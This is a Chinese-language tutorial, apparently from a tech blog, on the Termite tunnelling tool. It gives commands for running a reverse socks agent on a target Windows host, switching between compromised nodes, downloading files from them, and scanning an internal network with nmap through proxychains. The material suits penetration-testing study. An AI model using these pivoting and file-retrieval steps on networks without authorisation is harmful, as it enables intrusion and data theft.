Termite

简介: -l 指定本地socks端口,等待远程连-c 指定远程socks机器ip-p 指定远程socks机器端口适用端口转发的网络环境有以下几种:1. 服务器处于内网,可以访问外部网络。

-l 指定本地socks端口,等待远程连

-c 指定远程socks机器ip

-p 指定远程socks机器端口


适用端口转发的网络环境有以下几种:

1. 服务器处于内网,可以访问外部网络。

2. 服务器处于外网,可以访问外部网络,但是服务器安装了防火墙来拒绝敏感端口的连接。

3. 服务器处于内网,对外只开放了80端口,并且服务器不能访问外网网络。


测试环境:

win10(10.22.XX.XX),ubuntu(192.168.XX.XX),ubuntu1(192.168.XX.XXX)

在termite目录下使用此命令,在ubuntu机器上执行如下语句,语句成功执行后会返回一个id号,主要用来标识当前是哪一个agent,后期我们可以很方便的通过这个id号,灵活切换agent,本地的这个端口其实就是socks代理端口,也就是说,实战中我们可以把目标内网中的所有机器都弹到这一台指定的机器上

./agent_Linux64 -l 8989

在目标win机器上执行,下面的意思,说的通俗点其实就是建立反向socks

A对C的请求,B作为代理,代替A去访问C,并将结果返回给A,则B是正向代理

B主动与A的8888端口建立连接,并将A:8888的访问转为对C:80的访问,结果返回给A,则B是反向代理

反向代理的好处:当AB之间有防火墙,不允许A连B,但是允许B连A

agent_Win32.exe -c  192.168.XX.XX -p 8989

在ubuntu上admin端连接ubuntu01机器上刚刚监听的端口,连接成功后会自动进入termite的内置终端,在终端中执行'help'即可看到所有选项用途,'show'一下就可清晰地看到当前agent的分布

./admin_Linux64 -c 192.168.XX.XX -p 8989

去不同的节点,可以下载文件什么的

>>>goto    2

>>>downfile G:\python2.7\photo.py photo.py



利用Termite把b与a的端口映射

>>>>lcxtran 8989(ubuntu 端口) 172.16.18.1(ubuntu01 ip) 6565(ubuntu 端口)

利用proxychains进行转发

安装proxychains

$sudo apt-get install proxychains

修改proxychains文件

$ vim /etc/proxychains.conf

#defaults set to "tor"

#socks4    127.0.0.1 9050

socks5    127.0.0.1 8989

proxychains与nmap联合使用

proxychains nmap  10.22.XX.XX

目录
相关文章
|
网络协议
netstat 查看端口开放情况
netstat 查看端口开放情况
539 0
|
9月前
|
前端开发 API 开发者
React这些新特性在开发效率上有哪些改进
【4月更文挑战第18天】React 18 提升开发效率,引入新Root API `createRoot`优化挂载,支持渐进式升级,减少迁移成本。新增性能工具如Profiler API和Concurrent Mode,自动化批处理提高性能,减少重渲染。服务器组件优化加载速度,减轻客户端负担。开发者可更高效构建和优化React应用。
128 6
|
存储 缓存 算法
Java内存溢出问题深入探究及其解决策略
引言 Java内存溢出是一个常见且棘手的问题,可能会导致程序的性能急剧下降或者崩溃,给业务带来严重的影响。为了深入解析和理解此问题,本文将详细探究Java的内存模型,内存溢出的根本原因,诊断方法以及解决策略
390 0
|
9月前
|
机器学习/深度学习 算法 PyTorch
【SAHI】即插即用| SAHI操作可有效解决小目标检测过程中的难点!实现涨点
【SAHI】即插即用| SAHI操作可有效解决小目标检测过程中的难点!实现涨点
521 1
|
JavaScript
打包发布自己的app
打包发布自己的app
打包发布自己的app
|
9月前
|
编解码 监控 网络安全
python实战讲解之强版监控系统(上)
python实战讲解之强版监控系统
|
9月前
|
算法 API 网络架构
【分布式流控组件 Sentinel 快速入门】——图文详解操作流程(中)
【分布式流控组件 Sentinel 快速入门】——图文详解操作流程(中)
195 0
|
API 开发工具
uniapp怎么调用扫一扫功能?
uniapp怎么调用扫一扫功能?
273 0
|
大数据 网络安全
zookeeper集群搭建超详细教程
分享一下zookeeper集群搭建的详细过程
536 1